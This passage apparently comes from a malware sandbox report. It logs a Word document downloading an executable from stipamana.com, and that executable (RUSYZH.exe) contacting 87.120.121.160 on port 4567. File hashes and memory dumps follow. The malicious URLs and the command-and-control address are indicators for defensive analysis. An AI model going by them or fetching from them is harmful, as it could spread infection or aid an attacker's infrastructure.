      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
      Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
      ETag: 0x8D5E78DC0BDFFD8
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b597281b-e01e-00c0-4097-a0b22d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-us
      DNS
      202.26.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      202.26.123.92.in-addr.arpa
      IN PTR
      Response
      202.26.123.92.in-addr.arpa
      IN PTR
      a92-123-26-202deploystaticakamaitechnologiescom
    • flag-us
      DNS
      161.252.19.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      161.252.19.2.in-addr.arpa
      IN PTR
      Response
      161.252.19.2.in-addr.arpa
      IN PTR
      a2-19-252-161deploystaticakamaitechnologiescom
    • flag-us
      DNS
      dns.stipamana.com
      RUSYZH.exe
      Remote address:
      8.8.8.8:53
      Request
      dns.stipamana.com
      IN A
      Response
      dns.stipamana.com
      IN A
      87.120.121.160
    • flag-us
      DNS
      160.121.120.87.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      160.121.120.87.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      197.87.175.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      197.87.175.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.42.69.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.42.69.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      92.12.20.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      92.12.20.2.in-addr.arpa
      IN PTR
      Response
      92.12.20.2.in-addr.arpa
      IN PTR
      a2-20-12-92deploystaticakamaitechnologiescom
    • flag-us
      DNS
      83.210.23.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      83.210.23.2.in-addr.arpa
      IN PTR
      Response
      83.210.23.2.in-addr.arpa
      IN PTR
      a2-23-210-83deploystaticakamaitechnologiescom
    • flag-us
      DNS
      30.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      30.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 52.109.68.129:443
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      tls, http
      WINWORD.EXE
      1.8kB
      8.2kB
      12
      11

      HTTP Request

      POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

      HTTP Response

      200
    • 94.156.167.57:443
      https://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exe
      tls, http
      WINWORD.EXE
      6.2kB
      146.1kB
      117
      112

      HTTP Request

      GET https://www.stipamana.com/tysrerterseyuerthreytwsydtryerytsrt/gszgdargaerwgsergtsegregwa/ghtghdfgstrsrththsgthw/adzhtcfdhxfxgh.exe

      HTTP Response

      200
    • 88.221.134.137:80
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3D
      http
      WINWORD.EXE
      516 B
      1.1kB
      6
      4

      HTTP Request

      GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQUsVgYl9LUpmCNM7IJkm3dFg%3D%3D

      HTTP Response

      200
    • 92.123.26.202:443
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      tls, http
      WINWORD.EXE
      1.3kB
      6.0kB
      10
      11

      HTTP Request

      GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
      tls, http
      WINWORD.EXE
      2.6kB
      54.4kB
      37
      45

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
      tls, http
      WINWORD.EXE
      2.2kB
      52.9kB
      30
      44

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
      tls, http
      WINWORD.EXE
      2.1kB
      27.8kB
      26
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
      tls, http
      WINWORD.EXE
      2.6kB
      41.0kB
      36
      36

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
      tls, http
      WINWORD.EXE
      13.5kB
      322.2kB
      215
      237

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
      tls, http
      WINWORD.EXE
      1.9kB
      39.8kB
      25
      35

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
      tls, http
      WINWORD.EXE
      147.6kB
      3.4MB
      2103
      2469

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      tls, http
      WINWORD.EXE
      83.9kB
      2.6MB
      1483
      1907

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
      tls, http
      WINWORD.EXE
      1.9kB
      40.5kB
      24
      35

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
      tls, http
      WINWORD.EXE
      44.3kB
      1.9MB
      862
      1338

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
      tls, http
      WINWORD.EXE
      12.5kB
      321.0kB
      185
      235

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
      tls, http
      WINWORD.EXE
      2.5kB
      40.3kB
      35
      34

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
      tls, http
      WINWORD.EXE
      1.8kB
      37.6kB
      23
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
      tls, http
      WINWORD.EXE
      2.3kB
      39.8kB
      31
      35

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
      tls, http
      WINWORD.EXE
      2.3kB
      37.1kB
      31
      33

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
      tls, http
      WINWORD.EXE
      26.8kB
      752.6kB
      454
      545

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
      tls, http
      WINWORD.EXE
      103.5kB
      3.6MB
      1892
      2563

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
      tls, http
      WINWORD.EXE
      2.1kB
      27.3kB
      26
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
      tls, http
      WINWORD.EXE
      2.3kB
      27.7kB
      30
      30

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
      tls, http
      WINWORD.EXE
      2.8kB
      40.1kB
      41
      40

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
      tls, http
      WINWORD.EXE
      11.9kB
      338.5kB
      187
      248

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
      tls, http
      WINWORD.EXE
      96.1kB
      2.7MB
      1624
      1959

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab
      tls, http
      WINWORD.EXE
      1.7kB
      26.3kB
      18
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab
      tls, http
      WINWORD.EXE
      2.4kB
      33.2kB
      25
      32

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      tls, http
      WINWORD.EXE
      3.5kB
      74.2kB
      47
      59

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

      HTTP Response

      200

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
      tls, http
      WINWORD.EXE
      2.1kB
      27.9kB
      20
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
      tls, http
      WINWORD.EXE
      2.1kB
      25.6kB
      25
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
      tls, http
      WINWORD.EXE
      2.0kB
      28.2kB
      24
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
      tls, http
      WINWORD.EXE
      2.2kB
      29.8kB
      28
      27

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
      tls, http
      WINWORD.EXE
      1.6kB
      28.1kB
      19
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
      tls, http
      WINWORD.EXE
      1.8kB
      27.7kB
      19
      26

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
      tls, http
      WINWORD.EXE
      2.0kB
      26.4kB
      24
      25

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
      tls, http
      WINWORD.EXE
      10.0kB
      286.2kB
      160
      211

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
      tls, http
      WINWORD.EXE
      10.1kB
      274.7kB
      182
      204

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      tls, http
      WINWORD.EXE
      26.2kB
      666.2kB
      428
      483

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      tls, http
      WINWORD.EXE
      38.1kB
      1.1MB
      648
      800

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      tls, http
      WINWORD.EXE
      21.7kB
      573.6kB
      346
      417

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      tls, http
      WINWORD.EXE
      10.0kB
      235.2kB
      143
      175

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      tls, http
      WINWORD.EXE
      25.6kB
      725.7kB
      430
      528

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      tls, http
      WINWORD.EXE
      34.1kB
      1.1MB
      589
      823

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
      tls, http
      WINWORD.EXE
      63.8kB
      1.9MB
      1136
      1401

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      tls, http
      WINWORD.EXE
      55.4kB
      1.4MB
      857
      987

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

      HTTP Response

      200
    • 2.19.252.161:443
      binaries.templates.cdn.office.net
      tls
      WINWORD.EXE
      1.0kB
      9.2kB
      13
      11
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
      tls, http
      WINWORD.EXE
      27.5kB
      989.5kB
      500
      717

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

      HTTP Response

      200
    • 2.19.252.161:443
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      tls, http
      WINWORD.EXE
      9.4kB
      244.8kB
      145
      182

      HTTP Request

      GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

      HTTP Response

      200
    • 87.120.121.160:4567
      dns.stipamana.com
      RUSYZH.exe
      701 B
      594 B
      10
      9
    • 87.120.121.160:4567
      dns.stipamana.com
      RUSYZH.exe
      7.6kB
      12.1kB
      124
      238
    • 87.120.121.160:4567
      dns.stipamana.com
      RUSYZH.exe
      7.8kB
      6.3kB
      65
      123
    • 8.8.8.8:53
      228.249.119.40.in-addr.arpa
      dns
      73 B
      159 B
      1
      1

      DNS Request

      228.249.119.40.in-addr.arpa

    • 8.8.8.8:53
      roaming.officeapps.live.com
      dns
      WINWORD.EXE
      73 B
      250 B
      1
      1

      DNS Request

      roaming.officeapps.live.com

      DNS Response

      52.109.68.129

    • 8.8.8.8:53
      www.stipamana.com
      dns
      WINWORD.EXE
      63 B
      79 B
      1
      1

      DNS Request

      www.stipamana.com

      DNS Response

      94.156.167.57

    • 8.8.8.8:53
      r10.o.lencr.org
      dns
      WINWORD.EXE
      61 B
      224 B
      1
      1

      DNS Request

      r10.o.lencr.org

      DNS Response

      88.221.134.137
      88.221.135.105
      88.221.135.97
      88.221.134.144
      88.221.135.114
      88.221.134.115

    • 8.8.8.8:53
      129.68.109.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      129.68.109.52.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      23.159.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      23.159.190.20.in-addr.arpa

    • 8.8.8.8:53
      57.167.156.94.in-addr.arpa
      dns
      72 B
      132 B
      1
      1

      DNS Request

      57.167.156.94.in-addr.arpa

    • 8.8.8.8:53
      168.245.100.95.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      168.245.100.95.in-addr.arpa

    • 8.8.8.8:53
      137.134.221.88.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      137.134.221.88.in-addr.arpa

    • 8.8.8.8:53
      12.173.189.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      12.173.189.20.in-addr.arpa

    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
      147 B
      1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      metadata.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      231 B
      1
      1

      DNS Request

      metadata.templates.cdn.office.net

      DNS Response

      92.123.26.202
      92.123.26.161

    • 8.8.8.8:53
      binaries.templates.cdn.office.net
      dns
      WINWORD.EXE
      79 B
      202 B
      1
      1

      DNS Request

      binaries.templates.cdn.office.net

      DNS Response

      2.19.252.161
      2.19.252.143

    • 8.8.8.8:53
      202.26.123.92.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      202.26.123.92.in-addr.arpa

    • 8.8.8.8:53
      161.252.19.2.in-addr.arpa
      dns
      71 B
      135 B
      1
      1

      DNS Request

      161.252.19.2.in-addr.arpa

    • 8.8.8.8:53
      dns.stipamana.com
      dns
      RUSYZH.exe
      63 B
      79 B
      1
      1

      DNS Request

      dns.stipamana.com

      DNS Response

      87.120.121.160

    • 8.8.8.8:53
      160.121.120.87.in-addr.arpa
      dns
      73 B
      131 B
      1
      1

      DNS Request

      160.121.120.87.in-addr.arpa

    • 8.8.8.8:53
      197.87.175.4.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      197.87.175.4.in-addr.arpa

    • 8.8.8.8:53
      241.42.69.40.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      241.42.69.40.in-addr.arpa

    • 8.8.8.8:53
      92.12.20.2.in-addr.arpa
      dns
      69 B
      131 B
      1
      1

      DNS Request

      92.12.20.2.in-addr.arpa

    • 8.8.8.8:53
      83.210.23.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      83.210.23.2.in-addr.arpa

    • 8.8.8.8:53
      30.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      30.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RUSYZH.exe.log

      Filesize

      706B

      MD5

      d95c58e609838928f0f49837cab7dfd2

      SHA1

      55e7139a1e3899195b92ed8771d1ca2c7d53c916

      SHA256

      0407c814aef0d62aec7fd39b7c2f614746f0d8ff41f8ef957736f520f14b0339

      SHA512

      405310b29a833604c6627063bfdcf055a197e01f633ef21da238f1a6415a02e21315d689b4a6669db23e82152bed6f3492afb60963e6b2a0e9bb2ac09a480b5d

    • C:\Users\Admin\AppData\Local\Temp\TCDD597.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\tmpCC49.tmp

      Filesize

      1KB

      MD5

      9d9df2517964d8e049d41515f0d287c3

      SHA1

      2cf5f49554bbf0b73930d06b07e2bf12638d60b7

      SHA256

      03cddeda34c46e3bc77be33a37ae97dea02f4a2d6a8e4c3d208ca2bfa5bf242f

      SHA512

      807e30b096381211eebc6399bf879ce6f6aca5e0659a458403d4207f845c42f6a5f40eae8d00d94ad99917d94e4384e407428cd2f1c6837f9e8b12918f85c031

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      16B

      MD5

      d29962abc88624befc0135579ae485ec

      SHA1

      e40a6458296ec6a2427bcb280572d023a9862b31

      SHA256

      a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

      SHA512

      4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\RUSYZH.exe

      Filesize

      134KB

      MD5

      c5782fb8a119d6092f4816b8b39b5fa0

      SHA1

      68f2f0c4884168f1d775a6fc0f550150176ec402

      SHA256

      963bb7cbfda00f3033cfed5058521b0a4a42f797cc0e7473b0008ac1416e30e8

      SHA512

      d0809b3e54024cf08af7548525732d642a7ca00b0e8d30310377b4c9e74cc302c3ab926688da7776beabc055ed5bd5ef56d25e82e19e2ea3b6be08ffee214fe3

    • memory/1560-15-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-6-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-9-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-10-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp

      Filesize

      64KB

    • memory/1560-4-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

      Filesize

      64KB

    • memory/1560-2-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

      Filesize

      64KB

    • memory/1560-12-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-13-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-14-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-17-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-18-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-19-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-16-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp

      Filesize

      64KB

    • memory/1560-1-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

      Filesize

      64KB

    • memory/1560-11-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-47-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-8-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-0-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

      Filesize

      64KB

    • memory/1560-3-0x00007FFA4D26D000-0x00007FFA4D26E000-memory.dmp

      Filesize

      4KB

    • memory/1560-134-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-128-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-127-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1560-7-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

      Filesize

      64KB

    • memory/1560-5-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/1672-587-0x0000000005BA0000-0x0000000005C06000-memory.dmp

      Filesize

      408KB

    • memory/2388-95-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2388-94-0x0000000007390000-0x0000000007422000-memory.dmp

      Filesize

      584KB

    • memory/2388-93-0x0000000007940000-0x0000000007EE4000-memory.dmp

      Filesize

      5.6MB

    • memory/2388-92-0x00000000072F0000-0x000000000738C000-memory.dmp

      Filesize

      624KB

    • memory/2388-91-0x0000000004C70000-0x0000000004C9A000-memory.dmp

      Filesize

      168KB

    • memory/2388-90-0x0000000000320000-0x0000000000346000-memory.dmp

      Filesize

      152KB

    • memory/2388-89-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4120-96-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.